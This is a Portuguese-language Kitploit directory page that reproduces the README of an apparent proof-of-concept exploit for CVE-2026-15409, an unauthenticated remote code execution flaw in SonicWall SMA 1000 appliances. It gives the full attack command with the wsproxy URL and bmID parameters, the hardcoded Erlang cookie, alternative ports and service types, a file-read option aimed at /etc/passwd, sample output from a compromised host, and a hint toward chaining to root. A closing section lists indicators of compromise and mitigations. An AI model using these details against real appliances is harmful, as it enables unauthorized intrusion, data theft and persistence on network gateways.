Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/ch4120n/cve-2026-15409
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosPós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHubch4120n/cve-2026-15409

CVE-2026-15409

Prova de conceito de exploit para CVE-2026-15409 (SonicWall SMA 1000 RCE) via distribuição Erlang sobre WebSocket. Alcança execução remota de código não autenticada como usuário couchdb.

Ver Repositório
13há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚀 CVE-2026-15409 – RCE em Erlang no SonicWall SMA 1000 via Proxy WebSocket

Python Exploit CVE

GitHub stars GitHub issues License

Exploit de Prova de Conceito para o CVE-2026-15409 – execução remota de código não autenticada em appliances da série SonicWall SMA 1000 por meio do protocolo de distribuição Erlang tunelado via WebSocket.


📖 Visão Geral

O CVE-2026-15409 é uma vulnerabilidade crítica que afeta os appliances SonicWall SMA 1000 (versões anteriores ao hotfix de junho de 2026). A falha reside no serviço (normalmente exposto na porta 443), que faz proxy de conexões WebSocket para nós Erlang internos. Ao forjar um parâmetro válido e usar um cookie Erlang fixo (hardcoded), um atacante pode estabelecer um canal de distribuição autenticado e executar comandos arbitrários do sistema como o usuário (ou outras contas de privilégios baixos) por meio de chamadas RPC a .

WorkPlace
bmID
couchdb
os:cmd/1

Este repositório fornece uma PoC totalmente funcional que automatiza toda a cadeia de exploração – do handshake WebSocket à execução de comandos arbitrários – com uma interface limpa, tratamento avançado de erros e logging bem formatado.

🔍 Principais Recursos

  • Tunelamento WebSocket – funciona diretamente sobre wss:// usando o endpoint wsproxy.
  • Protocolo de distribuição Erlang – implementa completamente o handshake e o ETF (Erlang External Term Format).
  • Execução remota de código – via os:cmd/1; pode ler arquivos via file:read_file/1 ou testar a conectividade com erlang:node/0.
  • Detecção inteligente – suporta valores arbitrários de bmID (desde que comecem com -3389) e múltiplos valores de serviceType.
  • Logging abrangente – mensagens coloridas com os símbolos [+], [*], [-], [!] para facilitar o monitoramento.

🧬 Detalhes da Vulnerabilidade

A vulnerabilidade decorre das seguintes fraquezas de design no SMA 1000:

  1. Proxy WebSocket irrestrito – O endpoint /wsproxy encaminha mensagens WebSocket binárias para uma porta local de distribuição Erlang (localhost:1050 por padrão) sem autenticação ou autorização adequadas.
  2. Cookie Erlang previsível/fixo (hardcoded) – O cookie usado para autenticação de distribuição é estático em todos os appliances SMA (pelo menos na versão testada). Isso permite que um atacante externo conclua o handshake.
  3. Nó Erlang exposto – O nó Erlang [email protected] escuta na porta 1050 e aceita conexões do proxy WebSocket, tornando-o alcançável a partir da rede.
  4. Interface RPC poderosa – O nó Erlang oferece o serviço padrão rex, que pode executar funções arbitrárias no nó, incluindo os:cmd/1.

Versões Afetadas

  • Série SonicWall SMA 1000 com firmware anterior ao hotfix de junho de 2026 (ex.: ex_sra_vm_12.5.0-02002.ova).
  • O serviço WorkPlace deve estar habilitado (configuração padrão).

Impacto

  • Execução Remota de Código como o usuário couchdb (UID 1010, grupo daemon).
  • Movimentação lateral – um atacante pode explorar o CVE-2026-15410 (path traversal em XML-RPC) para elevar privilégios para root.
  • Exfiltração de dados – ler arquivos arbitrários via file:read_file/1.
  • Persistência – instalar backdoors ou modificar arquivos do sistema.

🔧 Requisitos de Exploração

  • Acesso de rede ao serviço WorkPlace do appliance SMA (normalmente TCP/443).
  • Nenhuma credencial válida é necessária – o exploit funciona sem autenticação.
  • Python 3.8+ com a biblioteca websockets (instale via pip install websockets).

🚀 Uso

Instalação

root@kitploit:~
git clone https://github.com/Ch4120N/CVE-2026-15409.git
cd CVE-2026-15409
pip install -r requirements.txt   # websockets

Comando Básico

root@kitploit:~
python3 cve-2026-15409.py \
  --ws-url 'wss://TARGET_IP/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' \
  --ws-user-agent 'SMA Connect Agent' \
  --ws-insecure-tls \
  --exec 'whoami && id && pwd && hostname'

Exemplo de Saída

root@kitploit:~
  ░█▀▀░█░█░█▀▀░░░░░▀▀▄░▄▀▄░▀▀▄░▄▀▀░░░░░▀█░░█▀▀░█░█░▄▀▄░▄▀▄
  ░█░░░▀▄▀░█▀▀░▄▄▄░▄▀░░█/█░▄▀░░█▀▄░▄▄▄░░█░░▀▀▄░░▀█░█/█░░▀█
  ░▀▀▀░░▀░░▀▀▀░░░░░▀▀▀░░▀░░▀▀▀░░▀░░░░░░▀▀▀░▀▀░░░░▀░░▀░░▀▀░
                    [CVE-2026-15409]
         Erlang Distribution RCE via WebSocket Proxy
                     Owner: Ch4120N

[ * ] Connecting via WebSocket to wss://192.168.56.102/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050
[ * ] Preparing RPC: os:cmd('whoami && id && pwd && hostname')
[ + ] Authenticated to [email protected]
[ * ] Calling os:cmd/1 ...
[ + ] RPC call completed
[ * ] Peer name: [email protected]
[ * ] Peer flags: 0xd07df7fbd
[ * ] Peer creation: 1784069352
[ + ] Command output:
couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma

Opções Avançadas

ArgumentoDescrição
--host, --portFallback TCP (se não estiver usando WebSocket)
--cookieSubstitui o cookie fixo padrão
--nameNome personalizado do nó Erlang local
--ws-originDefine o cabeçalho Origin para o WebSocket
--ws-user-agentString de User-Agent (padrão: SMA Connect Agent)
--ws-insecure-tlsDesativa a verificação TLS (certificados autoassinados)
--read-fileLê um arquivo do alvo (ex.: /etc/passwd)
--rpcApenas testa a conexão chamando erlang:node/0

🧪 Detalhes Técnicos para Detecção e Ajuste

Cookie Fixo (Hardcoded)

O cookie Erlang usado no exploit é:

root@kitploit:~
10ecad5b446e86864832904cd439b6b70262

Este valor é consistente em todos os appliances SMA testados e está fixo (hardcoded) no processo Erlang em localhost:1050. Ele não é o mesmo cookie configurado pelo usuário para clustering.

O Parâmetro bmID

O bmID deve começar com -3389 (ex.: -3389c1b25ccd). Valores arbitrários após o prefixo são aceitos; portanto, a detecção baseada em assinatura não deve depender de um hash fixo.

Tipos de Serviço

Embora o exemplo use serviceType=SSH, outros valores como TELNET também funcionam. O exploit é agnóstico quanto ao tipo de serviço.

Seleção de Porta

A porta 1050 é a porta interna padrão, mas ataques reais já foram observados visando também a porta 8188. O exploit pode ser adaptado para qualquer porta que exponha o protocolo de distribuição Erlang.

Escalação de Privilégios

Após obter um shell como couchdb, um atacante pode explorar o CVE-2026-15410 – um path traversal em XML-RPC que permite a remoção do hotfix e a subsequente escalada de privilégios para root.


🛡️ Detecção e Mitigação

Indicadores de Comprometimento (IoCs)

  • Conexões WebSocket incomuns para /wsproxy com bmID começando com -3389.
  • Conexões de saída inesperadas do appliance SMA para IPs externos.
  • Processos iniciados pelo usuário couchdb (ex.: bash, python, nc).
  • Modificação ou criação de arquivos em /var/tmp/ pelo usuário couchdb.

Ações Recomendadas

  1. Aplique o patch oficial da SonicWall (hotfix de junho de 2026) imediatamente.
  2. Restrinja o acesso ao serviço WorkPlace apenas a faixas de IP confiáveis.
  3. Monitore os logs para atividade WebSocket anômala e tentativas de distribuição Erlang.
  4. Altere o cookie Erlang do nó Erlang interno (se possível) – embora isso possa afetar a funcionalidade do aplicativo.
  5. Desative o serviço WorkPlace se não for necessário.

👏 Créditos

  • descoberta e PoC: Ch4120N.
  • Pesquisa adicional: SonicWall PSIRT e a comunidade de segurança em geral.

📄 Licença

Este projeto é licenciado sob a Licença MIT – consulte o arquivo LICENSE para obter detalhes.

Aviso legal: Esta ferramenta destina-se apenas a fins educacionais e de testes autorizados. O autor e os colaboradores não são responsáveis por qualquer uso indevido ou dano causado por este software.


📚 Referências

  • Aviso de Segurança da SonicWall (CVE-2026-15409)
  • Entrada no NIST NVD – CVE-2026-15409

⭐ Suporte

Se você achar esta PoC útil, considere dar uma ⭐ no GitHub e compartilhá-la de forma responsável. Contribuições, issues e pull requests são bem-vindos!


Bons hacks! 🛡️

Baixar ferramenta